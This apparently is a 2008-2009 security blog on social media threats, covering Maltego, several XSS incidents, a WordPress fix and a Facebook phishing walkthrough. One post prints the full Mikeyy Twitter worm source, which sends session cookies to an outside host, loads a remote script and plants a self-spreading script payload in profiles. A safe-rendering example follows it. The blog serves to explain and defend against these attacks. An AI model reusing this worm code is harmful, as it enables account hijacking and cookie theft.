Social Media Security

Tuesday, 19 May 2009

Information Gathering at its Greatest!

There is a tool I've found recently that is pure genius and very innovative. It is called Maltego, an information-gathering tool that uses backends and social sites like Facebook, Twitter, blog posts and more to gather information based on the details you give it and the searches you perform. The tool returns graph-based search results, pulling up everything it could find on the subject, whether that is a name, domain, email, DNS servers, linked sites and much, much more! This tool is a must have for enumeration, and the great part is that the community edition is free! Download the community edition here. If you need some help getting started you can view the video tutorials here.

- "Information is power. Information is Maltego."

Wednesday, 22 April 2009

Google Me

Google revealed that the company will serve Personal Profiles via the search results. Probably not a big deal, but this is yet another example of how far Web 2.0 technologies will go. It will be interesting to see how everything pans out. The good thing is that your profile is not available to the public by default. You need to opt in.

I will most definitely be watching...

Friday, 17 April 2009

Mikeyy Returns

According to Mashable, the Mikeyy twitter worm has returned.



I am personally not surprised. Given the ease of finding XSS vectors nowadays it is more surprising that we haven't seen massive XSS outbreaks everywhere.

XSS attacks and worms will become more and more relevant as the web expands, because they are de facto the equivalent of buffer overflows in the software security world.

I think I talked about this stuff 4-5 years ago.

Wednesday, 15 April 2009

Twitter Worm

As I've already mentioned on the GNUCITIZEN blog, Twitter has been hit by the same worm twice. The worm is similar in nature to the infamous Samy XSS Worm which hit MySpace in 2005, but a lot less severe. This is yet another example that XSS worms could and will be used as a propagation mechanism for more severe types of malware.

For those who are curious, here is the complete worm code:

// Minimal cross-browser XMLHttpRequest wrapper used by the worm to send its requests.
function XHConn()
{
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
        if (!xmlhttp) return false;
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET")
            {
                xmlhttp.open(sMethod, sURL+"?"+sVars, true);
                sVars = "";
            }
            else
            {
                xmlhttp.open(sMethod, sURL, true);
                xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
                xmlhttp.setRequestHeader("Content-Type",
                    "application/x-www-form-urlencoded");
            }
            xmlhttp.onreadystatechange = function(){
                if (xmlhttp.readyState == 4 && !bComplete)
                {
                    bComplete = true;
                    fnDone(xmlhttp);
                }};
            xmlhttp.send(sVars);
        }
        catch(z) { return false; }
        return true;
    };
    return this;
}

// PHP-style urlencode: percent-encodes the string, then normalises a few
// characters and uppercases the hex digits.
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });

    return ret;
}

// Reads the logged-in user's screen name out of the page, then exfiltrates it
// together with the session cookie to the hosts named in the worm.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];

var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

// Runs after a short delay: grabs the CSRF token from the page, posts a random
// spam status, and stores the <script> payload in the profile URL field so that
// anyone who views the infected profile runs the worm as well.
function wait()
{
    var content = document.documentElement.innerHTML;

    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);

    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";

    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

    updateEncode = urlencode(genRand);

    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
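The worm got in because the profile URL field (user[url]) was written into the page unescaped. As an added illustration, not part of the original post or the worm, the following contrasts that unsafe rendering with a version that checks the URL scheme and HTML-escapes the value before placing it in an anchor. The function names and the example.com inputs are my own assumptions; WORM_URL is the payload string copied from the worm code above.

```javascript
// Added example, not from the original post: unescaped rendering of a profile
// URL (the defect the worm above exploited through user[url]) beside a
// scheme-checked, HTML-escaped rendering. Function names are my own.
const WORM_URL =
  'http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ';

// Vulnerable: the stored value is concatenated straight into the markup, so a
// quote in the value closes the attribute and the tag and injects a <script>.
function renderProfileLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Output encoding for HTML attribute values and text nodes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Input validation: only absolute http(s) URLs are accepted. Anything the
// WHATWG URL parser rejects (the worm payload carries '<' and '>' inside the
// host part) or that uses another scheme (javascript:, data:) is refused.
function isAllowedProfileUrl(url) {
  let parsed;
  try { parsed = new URL(url); } catch (e) { return false; }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Hardened: validate, then escape. Escaping still runs for a URL that passes
// validation, because validation and output encoding are separate layers; a
// quote inside a syntactically valid URL must not be able to break the attribute.
function renderProfileLinkSafe(url) {
  if (!isAllowedProfileUrl(url)) return '';   // render no link rather than a bad one
  const esc = escapeHtml(url);
  return '<a href="' + esc + '" rel="nofollow">' + esc + '</a>';
}
```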

Monday, 15 December 2008

New Facebook XSS Vulnerabilities

There was some buzz today about four new Facebook XSS vulnerabilities announced. XSS (cross-site scripting) is nothing new for Facebook, but it's interesting since there is a pretty impressive worm called Koobface still making its way around the Facebook user base (now spreading to Bebo). Koobface spread easily through social engineering techniques, and XSS has been used to assist with similar types of attacks in the past. It will be interesting to see if there will be a combined Koobface/XSS type attack in the future.

I won't go into a ton of detail about these new vulnerabilities, but for a very good write-up on these flaws and how they might relate to other attacks going on with social media, check out Dancho Danchev's article over at ZDNet.

Saturday, 29 November 2008

WordPress Upgrades to 2.6.5

A reminder to all you WordPress users...make sure you update to version 2.6.5. From the WordPress Blog:

"The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package. 2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests.

...note that we are skipping version 2.6.4 and jumping from 2.6.3 to 2.6.5 to avoid confusion with a fake 2.6.4 release that made the rounds. There is not and never will be a version 2.6.4."

If you get something that tells you to install 2.6.4...don't do it! :-)

Monday, 17 November 2008

Analysis of a new Facebook phish

I recently noticed an interesting trend with Facebook. There seems to be an increase in spam, and in particular a new type of phishing attempt has emerged that I have been seeing signs of on many different profiles. While phishing via Facebook is nothing new, this one is a bit different, as the victim is not taken to a website that "looks" like a Facebook login page. This phish uses painfully annoying questions and pop-ups to get you to divulge your account information.

Do not go to any of the URLs mentioned in this article! You have been warned!

How does the phish work?
You will get an email or notice a wall post from one of your friends on Facebook. Note that the friend who posted to your wall has either had their account compromised or has genuinely fallen for the scam and sent the links out manually...more on that in a minute.


Initial contact via email notification or wall post (below).



Notice the really bad wording of the following:
"hey has anyone messaged you to let you know your face book pictre is all over ****.com?"
Notice the bad grammar and misspelling? This should be your first clue that this is a phish, and you should not check out this domain no matter how curious you are! The bad news is that most people will check it out....

Next, a pop-up will appear showing a link to hxxp://rotating -destination.com.


More "enticing" wording for you to click the OK button.

Clicking on this pop-up asks you to enter in the name of your friend, your name and your email.


Next, it takes you to this pop-up asking for your password for "registration".



After entering in your password it asks you how you found the site.


Interestingly, if you click on MySpace or Facebook it says it cannot retrieve your image.


After clicking on a link (they all seem to lead to the same place) you will get to a page that tells you that they can't serve content to Facebook/MySpace.



Clicking the back button you will get another pop-up, and after that you have to participate in an online "quiz". It's in a frame and really looks more like the ads you see online (click on the monkey, etc). This is the part that generates ad revenue for the phisher.



After the quiz you get to a screen which says that you have an image waiting for you and gives you a link to click.


Clicking on the link takes you to a site with a picture of a monkey and plays the sound of someone laughing...nice.



Finally, there is a link at the bottom of this picture that takes you to a page telling you how to send this "harmless prank" to your friends....



Not sure if I have seen a phisher actually ask you for help! It makes things even easier for the phish creator. They even tell you to use "regular" email, as you don't want Facebook to block you for being a "spammer"...

What's the end result?
The victim who goes to this website and enters all the information requested will get their Facebook and/or MySpace profile hijacked (probably with an automated login script) and most likely their email compromised as well. Unfortunately, most people use the same password for both social media sites and email, so this is a rather serious problem. If you or anyone you know fell victim to this phish, I advise changing your social media and email passwords immediately.

Special thanks to Greg and Tyler for helping out with the detailed analysis of this phish. Greg and Tyler do a ton of great malware analysis, and they did some research to help determine if this phish was malware related. While no malicious downloads were detected in this specific instance, Greg mentions the following additional information about this phish:
  • The IP of the first domain is associated with 16 domains that have been related to malware in the past (some serving Zlob trojans and one related to bogus blogs), so don't be surprised if this scam gets more aggressive in the future.
  • The IP is hosted with Oversee.net, which is associated with about 90 instances of malware and rogue software.
  • There is code in the HTML where a 1 pixel x 1 pixel (essentially hidden) graphic would be served up, but that code is commented out. So at some point that graphic might have carried some exploit code, or perhaps been used to log your IP.
Some thoughts on how not to be a victim
Here are a few things to remember so you don't become a victim of these and other types of scams:
  • Use a different, complex password for each of your accounts. That way, if one password gets compromised, all your other accounts don't get compromised as well.
  • Even if your friends want you to click on links, be cautious! You never know if their profiles or email accounts have been hacked!
  • Look for bad grammar and misspelled words as your first clue to a phish.
  • Check out the Facebook Privacy & Security Guide which gives you some good tips to follow when using social media websites.